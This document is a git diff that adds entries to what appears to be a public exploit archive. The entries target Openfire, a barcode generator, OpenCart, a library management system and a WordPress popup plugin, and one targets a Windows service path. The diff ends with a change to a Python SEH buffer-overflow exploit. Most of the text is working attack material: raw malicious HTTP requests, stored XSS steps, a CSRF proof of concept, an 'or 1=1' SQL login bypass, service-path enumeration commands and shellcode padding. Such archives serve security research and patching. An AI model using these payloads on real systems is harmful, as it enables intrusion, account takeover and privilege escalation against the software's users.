diff --git a/exploits/jsp/webapps/49229.txt b/exploits/jsp/webapps/49229.txt new file mode 100644 index 000000000..d116f4be6 --- /dev/null +++ b/exploits/jsp/webapps/49229.txt @@ -0,0 +1,27 @@ +# Exploit Title: Openfire 4.6.0 - 'path' Stored XSS +# Date: 20201209 +# Exploit Author: j5s +# Vendor Homepage: https://github.com/igniterealtime/Openfire +# Software Link: https://www.igniterealtime.org/downloads/ +# Version: 4.6.0 + +POST /plugins/nodejs/nodejs.jsp HTTP/1.1 +Host: 192.168.137.137:9090 +User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 +Firefox/68.0 +Content-Length: 60 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Content-Type: application/x-www-form-urlencoded +Cookie: JSESSIONID=node087pcmtxo1yry1fzb5tlt5bz4c19.node0; +csrf=dWiihlZamEAB0mrO; DWRSESSIONID=oWZp3ax5c9EpPgMNZv4T4BASYrwhhv3K8pn; +jiveforums.admin.logviewer=debug.size=0&all.size=524269&warn.size=856459&error.size=0&info.size=145819 +Origin: http://192.168.137.137:9090 +Referer: http://192.168.137.137:9090/plugins/nodejs/nodejs.jsp +Upgrade-Insecure-Requests: 1 +Accept-Encoding: gzip + +path=%22%3E%3CScRiPt%3Eaozunukfyd%3C%2FsCrIpT%3E&update=Save + +payload:"> \ No newline at end of file diff --git a/exploits/php/webapps/49227.txt b/exploits/php/webapps/49227.txt new file mode 100644 index 000000000..d3a8e7467 --- /dev/null +++ b/exploits/php/webapps/49227.txt @@ -0,0 +1,37 @@ +# Exploit Title: Barcodes generator 1.0 - 'name' Stored Cross Site Scripting +# Date: 10/12/2020 +# Exploit Author: Nikhil Kumar +# Vendor Homepage: http://egavilanmedia.com/ +# Software Link: http://egavilanmedia.com/barcodes-generator-using-php-mysql-and-jsbarcode-library/ +# Version: 1.0 +# Tested On: Ubuntu + +1. Open the index.php page using following url + +http://localhost/Barcodes-Generator-Using-PHP-MySQL-and-JsBarcode/index.php + +click on the New Barcode + +2. Intercept the request through burp suite + +Put a payload on "name=" parameter + +Payload :- abc"> + +Malicious Request:: + +POST /Barcodes-Generator-Using-PHP-MySQL-and-JsBarcode/php/insert.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 6 +Origin: http://localhost +DNT: 1 +Connection: close +Referer: http://localhost/Barcodes-Generator-Using-PHP-MySQL-and-JsBarcode/index.php +Upgrade-Insecure-Requests: 1 + +name=abc"> \ No newline at end of file diff --git a/exploits/php/webapps/49228.txt b/exploits/php/webapps/49228.txt new file mode 100644 index 000000000..bbab819dc --- /dev/null +++ b/exploits/php/webapps/49228.txt @@ -0,0 +1,31 @@ +# Exploit Title: OpenCart 3.0.3.6 - Cross Site Request Forgery +# Date: 12-11-2020 +# Exploit Author: Mahendra Purbia {Mah3Sec} +# Vendor Homepage: https://www.opencart.com +# Software Link: https://www.opencart.com/index.php?route=cms/download +# Version: OpenCart CMS - 3.0.3.6 +# Tested on: Kali Linux + +#Description: +This product have the functionality which let user to add the wish-list of other user in to his/her cart. So, user A can add products to his/her wish-list and can make his/her wish-list public which let other users to see the wish-list. Now, as user B there is a button of add to cart , when you click on it that public wish-list will be added in to your cart. + +#Additional Information: +well i found this vulnerability in Opencart based websites but they not respond so i installed a lest version of Opencart CMS and hosted on localhost with help of XAMP and then i exploited that vulnerability. +Attack Vector: +1. create two accounts A(attacker) & B(victim) +2. login with A and add a product in cart and capture that particular request in burpsuite. +3. Now change the quantity if want and then create a csrf poc of that request. +4. Save it as .html and send it to victim. Now the product added to victims cart. + +#POC: + + +
+ + + + \ No newline at end of file diff --git a/exploits/php/webapps/49230.txt b/exploits/php/webapps/49230.txt new file mode 100644 index 000000000..cd47d80b2 --- /dev/null +++ b/exploits/php/webapps/49230.txt @@ -0,0 +1,21 @@ +# Exploit Title: Library Management System 2.0 - Auth Bypass SQL Injection +# Date: 2020-12-09 +# Exploit Author: Manish Solanki +# Vendor Homepage: https://www.sourcecodester.com/php/6849/library-management-system.html +# Software Link: https://www.sourcecodester.com/download-code?nid=6849&title=Library+Management+System+in+PHP%2FMySQLi+with+Source+Code +# Version: 2.0 +# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 + +#Vulnerable Page: admin page + +#Exploit +Open the Application +check the URL: +http://localhost/eb_magalona_lms + +Open Admin Login +Enter username: a' or 1=1-- +Enter password: ' + +click on login +The SQL payload gets executed and authorization is bypassed successfully \ No newline at end of file diff --git a/exploits/php/webapps/49231.txt b/exploits/php/webapps/49231.txt new file mode 100644 index 000000000..62915cfe6 --- /dev/null +++ b/exploits/php/webapps/49231.txt @@ -0,0 +1,73 @@ +# Exploit Title: WordPress Plugin Popup Builder 3.69.6 - Multiple Stored Cross Site Scripting +# Date: 11/27/2020 +# Exploit Author: Ilca Lucian Florin +# Vendor Homepage: https://sygnoos.com +# Software Link: https://wordpress.org/plugins/popup-builder/ / https://popup-builder.com/ +# Version: <= 3.69.6 +# Tested on: Latest Version of Desktop Web Browsers: Chrome, Firefox, Microsoft Edge + +The Popup Builder – Responsive WordPress Pop up – Subscription & Newsletter +Plugin is vulnerable to stored cross site scripting. There are multiple +parameters vulnerable to cross site scripting. + +All versions up to 3.69.6 are vulnerable to stored cross site scripting. + +More information about this plugin could be found on the following links: + +1. https://wordpress.org/plugins/popup-builder/ +2. https://popup-builder.com/ + +Cross site scripting (XSS) is a common attack vector that injects malicious +code into a vulnerable web application. XSS differs from other web attack +vectors (e.g., SQL injections), in that it does not directly target the +application itself. Instead, the users of the web application are the ones +at risk. A successful cross site scripting attack can have devastating +consequences for an online business’s reputation and its relationship with +its clients. Stored XSS, also known as persistent XSS, is the more damaging +of the two. It occurs when a malicious script is injected directly into a +vulnerable web application. + +# How to reproduce # + +1. Login as Editor or Administrator: https://website.com/wp-login/ + +2. Go to the following link: +https://website.com/wp-admin/edit.php?post_type=popupbuilder or search for +PopUp Builder and select or create new PopUp. + +2. Click edit + +3. Search and find: # Custom JS or CSS + +4. On JS -> Opening events section, add two payloads, one for #2 section +and one for #3 section, like in the following example: + +#2 Add the code you want to run before the popup opens. This will be the +code that will work in the process of opening the popup. true/false +conditions will not work in this phase. + + + +#3 Add the code you want to run after the popup opens. This code will work +when the popup is already open on the page. + + + +5. Click Update + +6. Go to https://website.com. The XSS alert will pop up. + +# All text-areas from JS section are vulnerable to stored cross site +scripting. + +Evidence: + +1. https://ibb.co/JvBTq0H +2. https://ibb.co/0KP7NFQ +3. https://ibb.co/3cFnVYF \ No newline at end of file diff --git a/exploits/windows/local/49226.txt b/exploits/windows/local/49226.txt new file mode 100644 index 000000000..089479935 --- /dev/null +++ b/exploits/windows/local/49226.txt @@ -0,0 +1,37 @@ +# Exploit Title: PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path +# Discovery by: Zaira Alquicira +# Discovery Date: 2020-12-10 +# Vendor Homepage: https://pdf-complete.informer.com/3.5/ +# Tested Version: 3.5.310.2002 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 10 Pro x64 es + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name, pathname, displayname, startmode | findstr /i +"Auto" | findstr /i /v "C:\Windows\\" | findstr /i "pdfsvc" | findstr /i /v +""" + +PDF Complete + +PDF Complete C:\Program Files (x86)\PDF Complete\pdfsvc.exe +/startedbyscm:66B66708-40E2BE4D-pdfcService +Auto + + +# Service info: + +C:\Users\TOSHIBA>sc qc "pdfcDispatcher" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: pdfcDispatcher + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\PDF Complete\pdfsvc.exe +/startedbyscm:66B66708-40E2BE4D-pdfcService + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : PDF Document Manager + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/remote/49217.py b/exploits/windows/remote/49217.py index 02a828769..176d16be5 100755 --- a/exploits/windows/remote/49217.py +++ b/exploits/windows/remote/49217.py @@ -51,6 +51,7 @@ PAYLOAD = ( b'\x90' * (2482 - len(SHELL)) + SHELL + b'\xeb\x10\x90\x90' + + # 0x1002071c: add esp,8 # ret 0x04 at libspp.dll (ASLR: False, Rebase: False, SafeSEH: False) struct.pack('